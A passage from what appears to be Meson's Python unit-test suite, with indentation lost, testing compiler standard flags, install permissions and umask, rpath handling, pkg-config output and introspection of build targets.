compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
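# The boolean in each tuple marks formats that are expected to make
# configuration fail (--just-symbols cannot be used to set an rpath).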
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
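# Building the 'reconfigure' target makes Ninja re-run Meson with the
# options recorded at configure time (here -Db_coverage=true).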
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
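# Build and install a static library into a temporary prefix, then build a
# separate app against it purely through the generated pkg-config file.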
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On these platforms, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
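        # build.ninja escapes '$' as '$$', hence the '$$ORIGIN' in the expected pattern.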
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
        as LD_LIBRARY_PATH, etc, so those parts of this test are skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
